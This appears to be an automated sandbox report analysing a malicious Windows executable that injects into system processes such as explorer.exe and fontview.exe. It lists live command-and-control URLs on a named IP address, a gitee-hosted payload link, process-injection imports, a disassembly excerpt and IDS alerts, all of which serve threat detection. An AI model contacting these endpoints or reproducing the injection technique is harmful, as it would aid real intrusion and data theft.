                      http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=enjB*W1on706Z889iAwcmYokmbY7OUWSub4RGZFTo5srT4NgG910VgRecjciZvPR4XAyh90HOJbDJon8RaVjQHO81y-ajNKJHNejxKSFcxTV5Qnm0UOlEx6R9lcXLM57LmDSuDAn68tRa6BlvHilxXgmsbfRSvIKzNgU5v5ER-LIEUdjL73kn6UlMaN5SNBb82*Uf09yBZnUSM2kXxcq7epbC59GPPHEmQjhIRA53rEfI-shE828m9HdjVXZs*drjKwiPSCKC-sPbbAcrEGpoQBg3ewMUYJY3eBz87XfKJw6YmDN5opmWduY3zlMkMrGMYk4ci7KQ9NDP6R4PX*FHXTAfInb1wSixuJkduD3ju49zc7Ntu7TzwxhkOcADsXgL7QMUs77nRoBQ2Wutko3OIjLqRtl8865gOuppXixmM8=0%Avira URL Cloudsafe
                      http://47.76.199.218om0%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=173580%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=0%Avira URL Cloudsafe
                      http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=H-KG2vKhpxJqL5lmR9ZFRYLzK6PDv8wdWWKBL0E8b4xToLTJIEyFobzTUGIDhQFSY*QJSm*Ua4R0nKTUopxtu5aRZUmxtV*TsHV29kf7cYL-MjTc*kRfIpjTbB7xzYWtqF*O5vPdazU9kHSC8*d0RJwPJPGxrPzKc6**Gf3IQhISENPCyElwA1seCe9t9MDzrO6s8tzVUaN6AoyzXj5JLHcYaDpiRstfb*fRmwgZ5cGzSva*FX2F3SWBZS-UXSUc1LXKbxj7BIlROOnBGq9W87Jahc5lRXYLahNkQgcSGnQfg8EVRIBmeFWLWQ93fKDkUgOIgCDf1MEG-z5XjVC1Xd1VbizNoV*Ov87GDYU96jq0srfmNJ*L5dU15FioMWjOk4nVpWQoyVcldVjZBj81YjBU2pN*JsxbItKeA*DsMEI=0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.5566331.com
                      47.76.199.218
                      truefalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=x3N9tEE0lQUf*i9u1AJBLZ3udzrGo7J9wzUQnwqEojuqL4*8d5TpYqNaLoElKA2eLt5tJwUso0CT4hx7*brOujTPxt86i1LQoCN1bWPfh0c6TblwURKXa*YTrdRDdpFzPPjdf6A5hqF6agS5bMFml2tycvxuF8UFeAKptoU6nA1cgx5I7zk50dryFihgpyA0PukB3pWbqvv1m9czQ98TexEeBUkYnPWhl9iP5lmz2GhU0unSn1dv0GeLH-OgLe5CX54v7Yi7WikjFNlbGcralrQa62waJH3pu9aTS352sJXA9uT9hy8ZcQrnfm*BM8ui63qGw1hOYc0Maww2aCZlGFx2c*WqEiD7rdNNLo2gqW-R05XE8J-33FyFPn7LMN6KEOJbTRxuzcnsrcYfCcxUhimBcpclNQDyBgNCuTCZtw4=false
                        • Avira URL Cloud: safe
                        unknown
                        http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563false
                        • Avira URL Cloud: safe
                        unknown
                        http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618false
                        • Avira URL Cloud: safe
                        unknown
                        http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535false
                        • Avira URL Cloud: safe
                        unknown
                        http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505false
                        • Avira URL Cloud: safe
                        unknown
                        http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590false
                        • Avira URL Cloud: safe
                        unknown
                        http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=H-KG2vKhpxJqL5lmR9ZFRYLzK6PDv8wdWWKBL0E8b4xToLTJIEyFobzTUGIDhQFSY*QJSm*Ua4R0nKTUopxtu5aRZUmxtV*TsHV29kf7cYL-MjTc*kRfIpjTbB7xzYWtqF*O5vPdazU9kHSC8*d0RJwPJPGxrPzKc6**Gf3IQhISENPCyElwA1seCe9t9MDzrO6s8tzVUaN6AoyzXj5JLHcYaDpiRstfb*fRmwgZ5cGzSva*FX2F3SWBZS-UXSUc1LXKbxj7BIlROOnBGq9W87Jahc5lRXYLahNkQgcSGnQfg8EVRIBmeFWLWQ93fKDkUgOIgCDf1MEG-z5XjVC1Xd1VbizNoV*Ov87GDYU96jq0srfmNJ*L5dU15FioMWjOk4nVpWQoyVcldVjZBj81YjBU2pN*JsxbItKeA*DsMEI=false
                        • Avira URL Cloud: safe
                        unknown
                        http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=enjB*W1on706Z889iAwcmYokmbY7OUWSub4RGZFTo5srT4NgG910VgRecjciZvPR4XAyh90HOJbDJon8RaVjQHO81y-ajNKJHNejxKSFcxTV5Qnm0UOlEx6R9lcXLM57LmDSuDAn68tRa6BlvHilxXgmsbfRSvIKzNgU5v5ER-LIEUdjL73kn6UlMaN5SNBb82*Uf09yBZnUSM2kXxcq7epbC59GPPHEmQjhIRA53rEfI-shE828m9HdjVXZs*drjKwiPSCKC-sPbbAcrEGpoQBg3ewMUYJY3eBz87XfKJw6YmDN5opmWduY3zlMkMrGMYk4ci7KQ9NDP6R4PX*FHXTAfInb1wSixuJkduD3ju49zc7Ntu7TzwxhkOcADsXgL7QMUs77nRoBQ2Wutko3OIjLqRtl8865gOuppXixmM8=false
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://word.office.comonexplorer.exe, 00000002.00000000.2044913659.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          https://powerpoint.office.comcemberexplorer.exe, 00000002.00000002.3305053857.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2051006700.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=17358raserver.exe, 0000000A.00000002.3293273554.0000000002ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=resmon.exe, 00000008.00000002.3293228985.0000000002888000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr1731043030539.exefalse
                              high
                              https://excel.office.comexplorer.exe, 00000002.00000002.3300221466.0000000009BE4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096750303.0000000009BE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096115014.0000000009B95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                http://schemas.microexplorer.exe, 00000002.00000000.2044223303.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3298493696.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3299027484.0000000008870000.00000002.00000001.00040000.00000000.sdmpfalse
                                  high
                                  https://gitee.com/didiaodewangzhe/jsonAPP/raw/master/raidjsonapi.cppcontrol.exe, fontview.exe, resmon.exe, BackgroundTransferHost.exe, raserver.exefalse
                                    high
                                    http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl071731043030539.exefalse
                                      high
                                      http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=control.exe, 00000003.00000002.3293163076.0000000002E84000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://outlook.comexplorer.exe, 00000002.00000002.3300221466.0000000009BE4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096750303.0000000009BE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096115014.0000000009B95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=17358resmon.exe, 00000008.00000002.3293228985.0000000002859000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=fontview.exe, 00000006.00000002.3293216939.0000000000BB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://47.76.199.218raserver.exe, 0000000A.00000002.3293273554.0000000002ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=17358BackgroundTransferHost.exe, 00000009.00000002.3293745116.0000000002A99000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000003.3183775857.0000000002A99000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=17358fontview.exe, 00000006.00000002.3293216939.0000000000B98000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://pki-ocsp.symauth.com01731043030539.exefalse
                                          high
                                          https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2039818389.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3297386884.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.2051006700.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3305053857.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              https://api.msn.com/explorer.exe, 00000002.00000003.3094503764.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=BackgroundTransferHost.exe, 00000009.00000003.3183748550.0000000002AB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://crl.vexplorer.exe, 00000002.00000002.3292960857.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2035928494.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://47.76.199.218omcontrol.exe, 00000003.00000002.3293163076.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000006.00000002.3293216939.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, resmon.exe, 00000008.00000002.3293228985.0000000002859000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000003.3183775857.0000000002A92000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000002.3293745116.0000000002A93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://wns.windows.com/)sexplorer.exe, 00000002.00000000.2044913659.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    47.76.199.218
                                                    api.5566331.comUnited States
                                                    9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1583249
                                                    Start date and time:2025-01-02 09:27:34 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 39s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:10
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:1731043030539.exe
                                                    Detection:MAL
                                                    Classification:mal100.evad.winEXE@13/1@1/1
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 93%
                                                    • Number of executed functions: 156
                                                    • Number of non-executed functions: 277
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.253.45
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    TimeTypeDescription
                                                    03:28:25API Interceptor785x Sleep call for process: explorer.exe modified
                                                    03:28:47API Interceptor5x Sleep call for process: control.exe modified
                                                    03:29:16API Interceptor5x Sleep call for process: fontview.exe modified
                                                    03:29:44API Interceptor4x Sleep call for process: resmon.exe modified
                                                    03:30:11API Interceptor5x Sleep call for process: BackgroundTransferHost.exe modified
                                                    No context
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    VODAFONE-TRANSIT-ASVodafoneNZLtdNZarmv7l.elfGet hashmaliciousUnknownBrowse
                                                    • 47.78.236.90
                                                    botx.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 49.226.28.57
                                                    zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                    • 47.79.48.211
                                                    QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                    • 47.79.48.211
                                                    armv7l.elfGet hashmaliciousMiraiBrowse
                                                    • 47.78.183.235
                                                    armv5l.elfGet hashmaliciousMiraiBrowse
                                                    • 49.227.11.95
                                                    nklsh4.elfGet hashmaliciousUnknownBrowse
                                                    • 121.74.237.200
                                                    sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 121.75.40.91
                                                    arm.elfGet hashmaliciousMiraiBrowse
                                                    • 47.78.236.95
                                                    arm5.elfGet hashmaliciousMiraiBrowse
                                                    • 27.252.170.217
                                                    No context
                                                    No context
                                                    Process:C:\Users\user\Desktop\1731043030539.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):266
                                                    Entropy (8bit):4.170207572684699
                                                    Encrypted:false
                                                    SSDEEP:6:vHP5EAgrP5X1PP5r0KxP5to1PP5YEyP5SyP5oP5e1PkP5QVbP1:vhpgdX1JA221JYEIBKxAr1
                                                    MD5:23B9E0EA3B42B889CA42AAD0BAA82CB7
                                                    SHA1:E773EFFEA437FACDDF642B43ED2A3BC6E926AB36
                                                    SHA-256:333F7CA1A6C2C68F19335853CDAE415D635FE9B12F055CC6AAB724FCD43A0697
                                                    SHA-512:52098958338AF77F8D8BFBC04EE092ABDA48B8440943069812CFEE302329AD7B350FC48630054738DD5DFF6FBE75C4A1DF6EE19E047D4A25480414F1C2D27BCC
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:...]......................]...........e;.........]...........]................]...........]................]...........]................]...........]................]............!............].........y.6..........]..............y.6.U......
                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Entropy (8bit):7.404156100365436
                                                    TrID:
                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                    • DOS Executable Generic (2002/1) 0.92%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:1731043030539.exe
                                                    File size:1'088'000 bytes
                                                    MD5:0ffa0039c3e96e4b95293b09db72cd85
                                                    SHA1:1b5cc84e46e0c6c40ce64c5d6a18885084da3256
                                                    SHA256:f747fb3f504a9c6b9e83162331951407fdb6d1e9afdfb7955821f2aca03f172b
                                                    SHA512:7b8a459402265e99f11d806133f9f07abb9ec08fbac92c4f5715a90263617e63989be19c1bbafdced6e8558b48939ed0d452ebe95a7010172556544403f26528
                                                    SSDEEP:12288:6s3DLfX68DXY8gjMUmokDa5cUUUOEl5w+Rg8YVeSBLQQBx2ebfvfQsnc8:JTLfHYh4Um65p5VkzUSBLDx2ezvfQsn
                                                    TLSH:9A350107368740A7C4BA867889A7BF01B3BA796103359BEF135493D91F637E05D39B22
                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....0Xf.........."..........|.................@..........................................`........................................
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x140001000
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x665830A3 [Thu May 30 07:54:11 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:3e479d5500318dface23fd2fb5d92cda
                                                    Instruction
                                                    push esi
                                                    push edi
                                                    dec eax
                                                    sub esp, 00000228h
                                                    dec eax
                                                    lea edx, dword ptr [0010AFF0h]
                                                    xor ecx, ecx
                                                    call 00007FAB70F7D1B9h
                                                    mov esi, eax
                                                    xor ecx, ecx
                                                    call dword ptr [0010875Fh]
                                                    dec eax
                                                    lea edi, dword ptr [esp+20h]
                                                    dec eax
                                                    mov ecx, eax
                                                    dec eax
                                                    mov edx, edi
                                                    inc ecx
                                                    mov eax, 00000104h
                                                    call dword ptr [00108738h]
                                                    dec eax
                                                    mov ecx, edi
                                                    call 00007FAB70F7E6C5h
                                                    mov ecx, esi
                                                    call dword ptr [00108708h]
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    inc ecx
                                                    push esi
                                                    push esi
                                                    push edi
                                                    push ebp
                                                    push ebx
                                                    dec eax
                                                    sub esp, 00000240h
                                                    dec eax
                                                    mov edi, edx
                                                    dec eax
                                                    mov esi, ecx
                                                    dec eax
                                                    mov edx, dword ptr [ecx+08h]
                                                    dec eax
                                                    lea ecx, dword ptr [edi+2Ch]
                                                    call dword ptr [001087E3h]
                                                    inc eax
                                                    mov ch, 01h
                                                    test eax, eax
                                                    jne 00007FAB70F7D090h
                                                    inc esp
                                                    mov eax, dword ptr [edi+08h]
                                                    mov ecx, 001FFFFFh
                                                    xor edx, edx
                                                    call dword ptr [0010872Fh]
                                                    dec eax
                                                    test eax, eax
                                                    je 00007FAB70F7D076h
                                                    dec eax
                                                    mov ebx, eax
                                                    dec esp
                                                    lea esi, dword ptr [esp+2Ch]
                                                    dec eax
                                                    mov ecx, eax
                                                    dec esp
                                                    mov edx, esi
                                                    call dword ptr [00108706h]
                                                    mov eax, dword ptr [esi+10h]
                                                    inc eax
                                                    mov ch, 01h
                                                    inc ecx
                                                    cmp eax, dword ptr [esi]
                                                    jne 00007FAB70F7D04Eh
                                                    dec esp
                                                    lea ecx, dword ptr [esp+28h]
                                                    inc ecx
                                                    mov dword ptr [ecx], 00000104h
                                                    dec esp
                                                    lea eax, dword ptr [esp+30h]
                                                    dec eax
                                                    mov ecx, ebx
                                                    xor edx, edx
                                                    call dword ptr [00108707h]
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x10943a0xa0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x10b0000xe4.pdata
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x10d0000x38.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x1096f00x210.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x18660x1a00ea8bab875c4dc55c25aaa846d617d43bFalse0.5360576923076923data5.856150049532572IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x30000x106ed40x107000daf86f80b57d60926446b95655c37d94False0.8123598280061787data7.418582481203113IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x10a0000x6000x6008023741cfcb04b07641f0734bbbe4c84False0.3736979166666667data3.7582715948787286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .pdata0x10b0000xe40x20032f7610296c75435df8f9d20850fccecFalse0.30078125data2.085268531812776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .sign0x10c0000x400x200b609c02f8ec77410395572fb357c1e03False0.08203125data0.3046166846600516IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x10d0000x380x20031793cffeb14835e25569b41ea018439False0.126953125GLS_BINARY_LSB_FIRST0.6437088733849333IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    DLLImport
                                                    cryptdll.dllMD5Final, MD5Init, MD5Update
                                                    KERNEL32.dllCloseHandle, CreateFileMappingW, CreateFileW, CreateMutexW, CreateProcessW, CreateRemoteThread, CreateToolhelp32Snapshot, DeleteProcThreadAttributeList, ExitProcess, GetComputerNameW, GetCurrentProcess, GetCurrentProcessId, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetThreadContext, GlobalAlloc, GlobalFree, InitializeProcThreadAttributeList, IsWow64Process, MapViewOfFile, OpenProcess, Process32FirstW, Process32NextW, QueryFullProcessImageNameW, ResumeThread, SetThreadContext, Sleep, UpdateProcThreadAttribute, VirtualAllocEx, VirtualFreeEx, VirtualProtectEx, WaitForSingleObject, Wow64GetThreadContext, Wow64SetThreadContext, WriteFile, WriteProcessMemory, lstrcatW, lstrcmpA, lstrcmpW, lstrcmpiW, lstrcpyW, lstrlenW
                                                    USER32.dllwsprintfW
                                                    ADVAPI32.dllAdjustTokenPrivileges, CloseServiceHandle, GetTokenInformation, LookupAccountSidW, LookupPrivilegeValueW, OpenProcessToken, OpenSCManagerW, OpenServiceW, QueryServiceStatusEx
                                                    SHLWAPI.dllPathFindFileNameW
                                                    ole32.dllStringFromGUID2
                                                    USERENV.dllExpandEnvironmentStringsForUserW
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2025-01-02T09:28:27.682748+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54970547.76.199.21880TCP
                                                    2025-01-02T09:28:33.248489+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54970647.76.199.21880TCP
                                                    2025-01-02T09:28:38.748633+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54970747.76.199.21880TCP
                                                    2025-01-02T09:28:44.165363+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54971247.76.199.21880TCP
                                                    2025-01-02T09:28:56.455947+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54978047.76.199.21880TCP
                                                    2025-01-02T09:29:01.859281+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54981547.76.199.21880TCP
                                                    2025-01-02T09:29:07.263497+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54985047.76.199.21880TCP
                                                    2025-01-02T09:29:12.685796+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54988347.76.199.21880TCP
                                                    2025-01-02T09:29:24.663598+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54995647.76.199.21880TCP
                                                    2025-01-02T09:29:30.062263+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54998747.76.199.21880TCP
                                                    2025-01-02T09:29:35.492858+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54998847.76.199.21880TCP
                                                    2025-01-02T09:29:40.889568+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54998947.76.199.21880TCP
                                                    2025-01-02T09:29:51.235726+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54999247.76.199.21880TCP
                                                    2025-01-02T09:29:56.827496+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54999347.76.199.21880TCP
                                                    2025-01-02T09:30:02.466649+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54999447.76.199.21880TCP
                                                    2025-01-02T09:30:07.874318+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54999547.76.199.21880TCP
                                                    2025-01-02T09:30:20.103478+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54999747.76.199.21880TCP
                                                    2025-01-02T09:30:25.498305+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54999847.76.199.21880TCP
                                                    2025-01-02T09:30:30.908500+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.54999947.76.199.21880TCP
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 2, 2025 09:28:27.668889046 CET4970580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:27.674048901 CET804970547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:27.674197912 CET4970580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:27.677767038 CET4970580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:27.682600021 CET804970547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:27.682748079 CET4970580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:27.687689066 CET804970547.76.199.218192.168.2.5
